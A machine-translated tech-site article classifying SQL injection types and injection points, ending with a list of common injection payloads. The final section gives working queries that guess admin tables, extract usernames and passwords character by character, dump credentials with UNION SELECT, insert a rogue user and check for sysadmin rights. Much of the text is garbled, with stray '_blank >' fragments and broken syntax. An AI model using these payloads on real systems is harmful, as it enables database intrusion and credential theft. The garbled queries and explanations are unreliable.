Shulou(Shulou.com)05/31 Report--

This article mainly introduces what there are three kinds of sql injection sentences, the article is very detailed, has a certain reference value, interested friends must read it!

There are three kinds of sql injection statements, which are: 1, numeric injection point, such as "select * from table name where id=1 and 1: 1"; 2, character injection point, such as "select * from table name where name..."; 3, search injection point.

Common statements of sql injection

SQL injection 1. What is sql injection

By inserting the SQL command into the Web form to submit or enter the query string requested by the domain name or page, the server can be deceived into executing malicious SQL commands.

2. Sql injection types are classified according to injection point types (1) Digital injection points

Many web page links have a similar structure http://xxx.com/users.php?id=1 based on this form of injection, generally called digital injection point, the reason is that its injection point id type is digital, in most web pages, such as viewing users' personal information, viewing articles, etc., most of them will use this form of structure to transmit information such as id, to the back end, query the corresponding information in the database, and return it to the foreground. The prototype of this kind of SQL statement is probably select * from table name where id=1. If there is injection, we can construct an injection statement similar to the following sql injection statement to burst: select * from table name where id=1 and 1

(2) character injection point

Web page links have a similar structure http://xxx.com/users.php?name=admin this form, its injection point name type is a character type, so it is called character injection point. The prototype of this type of SQL statement is probably the select * from table name where name='admin'. It is worth noting that there are more quotation marks than the numeric injection type sql statement prototype, which can be single or double quotation marks. If there is an injection, we can construct a sql injection statement similar to the following: select * from table name where name='admin' and 1 # 1'We need to get rid of these annoying quotes.

(3) search type injection point

This is a special type of injection. This kind of injection mainly means that the search parameters are not filtered during the data search, generally, there are "keyword= keywords" in the link address and some are not displayed in the link address, but are submitted directly through the search box form. The prototype of the SQL statement submitted by this kind of injection point is roughly as follows: select * from table name where field like'% keyword%'if there is injection, we can construct a similar sql injection statement to explode: select * from table name where field like'% test% 'and'% 1% destroy% 1%

Classify according to the way the data is submitted

(1) GET injection

The way to submit the data is GET, and the location of the injection point is in the GET parameter section. For example, there is such a link http://xxx.com/news.php?id=1, id is the injection point.

(2) POST injection

Use POST to submit data, and the injection point is located in the POST data section, which often occurs in the form.

(3) Cookie injection

The Cookie of the client is taken with the HTTP request, and the injection point is stored in a field in the Cookie.

(4) HTTP head injection

The injection point is in a field in the header of the HTTP request. For example, it exists in the User-Agent field. Strictly speaking, Cookie is actually a form of head injection. Because Cookie is a field in the header when HTTP requests.

Classify according to the effect of execution

(1) blind injection based on Boolean

That is, you can judge whether the condition is true or false according to the return page.

(2) time-based blind injection

That is, we can not judge any information according to the content returned by the page, and use the conditional statement to see whether the time delay statement is executed (that is, whether the page return time is increased).

(3) based on error injection

That is, the page returns an error message, or the result of the injected statement is returned directly to the page.

Single quotation mark

Double quotation marks

Based on digital injection

(4) Joint query injection

Injection in the case of union can be used.

Common sentences

1. To judge whether there is an injection point or not; and 1 and 1 22. Guess the general name of a table is nothing more than admin adminuser user pass password and so on. And 0 (select count (*) from *) and 0 (select count (*) from admin)-determine whether admin exists in Table 3. Guess the number of accounts if you encounter 0

0) 5. Guess the length of each field. Guess the length is to change > 0 until the correct page is returned, and 1 = (select count (*) from admin where len (*) > 0) and 1 = (select count (*) from admin where len (name) > 6) error and 1 = (select count (*) from admin where len (name) > 5) the correct length is 6 and 1 = (select count (*) from admin where len (name) = 6) correct and 1 = (select count (*) ) from admin where len (password) > 11) correct and 1 = (select count (*) from admin where len (password) > 12) error length is 12 and 1 = (select count (*) from admin where len (password) = 12) correct 6. Guess the character and 1 = (select count (*) from admin where left (name,1) = a)-guess the first bit of the user account and 1 = (select count (*) from admin where left (name,2) = ab)-guess the second bit of the user account one character at a time, guess how many digits you just guessed, and the account will calculate and 1 = (select top 1 count (*) from Admin where Asc (mid (pass)) 5 blank 1)) = 51)-this query can guess Chinese users and _ PIN > passwords. As long as the following number is changed into the Chinese ASIC code, OK. Finally, the result is converted into characters .group by users.id having 1mi-group by users.id, users.username, users.password, users.privs having 1m-1m- Insert into users values (666, attacker, foobar, 0xffff)-- UNION SELECT TOP 1 COLUMN_blank > _ NAME FROM INFORMATION_blank > _ SCHEMA.COLUMNSWHERE TABLE_blank > _ NAME=logintable- UNION SELECT TOP 1 COLUMN_blank > _ NAME FROM INFORMATION_blank > _ SCHEMA.COLUMNSWHERE TABLE_blank > _ NAME=logintable WHERE COLUMN_blank > _ NAME NOT IN (login_blank > _ id)-UNION SELECT TOP 1 COLUMN_blank > _ NAME FROM INFORMATION_blank > _ SCHEMA.COLUMNSWHERE TABLE_blank > _ NAME=logintable WHERE COLUMN_blank > _ NAME NOT IN (login_blank > _ id) Login_blank > _ name)-UNION SELECT TOP 1 login_blank > _ name FROM logintable- UNION SELECT TOP 1 password FROM logintable where login_blank > _ name=Rahul-- look at _ blank > server patch = error SP4 patch and 1 = (select @ @ VERSION)-see _ blank > permissions for database connection account Return to normal and prove to be _ blank > server role sysadmin permissions. And 1 = (SELECT IS_blank > _ SRVROLEMEMBER (sysadmin))-determine the connection _ blank > database account. (using SA account connection returned normal = proved that the connection account is SA) and sa= (SELECT System_blank > _ user)-- and user_blank > _ name () = dbo-- and 0 (select user_blank > _ name ()-- above is all the content of the article "what are the three sql injection statements?" Thank you for reading! Hope to share the content to help you, more related knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.